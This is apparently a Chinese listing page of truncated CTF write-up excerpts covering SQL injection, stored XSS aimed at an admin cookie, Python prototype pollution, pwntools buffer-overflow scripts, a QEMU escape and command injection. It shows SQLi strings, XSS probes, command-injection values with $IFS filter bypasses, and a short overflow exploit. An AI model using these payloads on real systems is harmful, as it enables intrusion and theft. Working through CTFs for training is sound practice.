先点查询1试试：再试试查询1'，看是否存在字符注入：?inject=1'#利用orderby查看有几个字段：?inject=1'orderby3#，?inject=1'orderby2#可以知道有两个字段，接下来利用联合查询：?inject=1'unionselect1,2#发现select被过滤了，那咱们利用堆叠注入来查看数据库，表名，?inject=1......

这个取证有点意思，也没有套太多。下载附件，直接FTK打开，我们发现两个分区，其中一个又hint.zip和一个图片，发现里面图片一致，一眼丁真明文攻击：打开见key:直接PasswordkitForensics开梭：然后FTK继续开，找到flag.txt，里面是个字符串，一眼十六进制转出摩斯密码：解密，是个奶牛快传：......

BUUXSSCOURSE首页如此显然是持久性xss将数据存储到后台管理员访问后台触发xss后可以盗取cookie对后台进行登录但我们还不知道后台地址先尝试：<script>alert(1)</script>提交成功尝试访问没有触发弹窗可能后台存在过滤尝试用img标签：<imgsrc='11'onerror=alert(11......

CTF题型python原型链污染题记和总结文章目录一般特征关键函数(判断python原型链污染依据)1.[GeekChanlleng2023ezpython]解题思路反思总结2.[DASCTF2023七月挑战赛]json识别`unicode`**全局变量获取**解题思路1读env：污染__globals____file__-->../../../......

题目：importosfromflagimportflagfromCrypto.Util.numberimport*fromCrypto.CipherimportAESm=88007513702424243702066490849596817304827839547007641526433597788800212065249key=os.urandom(24)key=bytes_to_long(key)n=m%keyflag+=(16-len(......

NSSCTF_pwn_刷题笔记page(1)[SWPUCTF2021新生赛]gift_pwnfrompwnimport*io=remote('node4.anna.nssctf.cn',28991)padding=16+8shell=0x4005B6payload=b'A'*padding+p64(shell)io.sendline(payload)io.interactive()[SWPUCTF2021新生赛]......

[GFCTF2021]where_is_shellshell的特殊姿势看上去很简单的栈溢出,但是问题在于找不到能用的/bin/sh或者sh这里出现了一个shell的新姿势:可以利用system($0)获得shell权限，$0在机器码中为\x24\x30在tips函数中正好有\x24\x30可以用来构造,所以需要取出0x400541关于ida打......

[MRCTF2020]你传你......

说在前面本文的草稿是边打边学边写出来的，文章思路会与一个“刚打完用户态pwn题就去打QEMUEscape”的人的思路相似，在分析结束以后我又在部分比较模糊的地方加入了一些补充，因此阅读起来可能会相对轻松。（当然也不排除这是我自以为是）题目github仓库[1]题目分析流程[1-1]......

首先尝试一下分号有没有被过滤：?ip=127.0.0.1;ls;可以看见分号没有被过滤，看到了flag.php和index.php两个文件，先尝试能不能打开flag.php：?ip=127.0.0.1;catflag.php;能看出空格被过滤了，我们用$IFS$1绕过空格：?ip=127.0.0.1;cat$IFS$1flag.php;可以看见flag也被过滤了，我们打开i......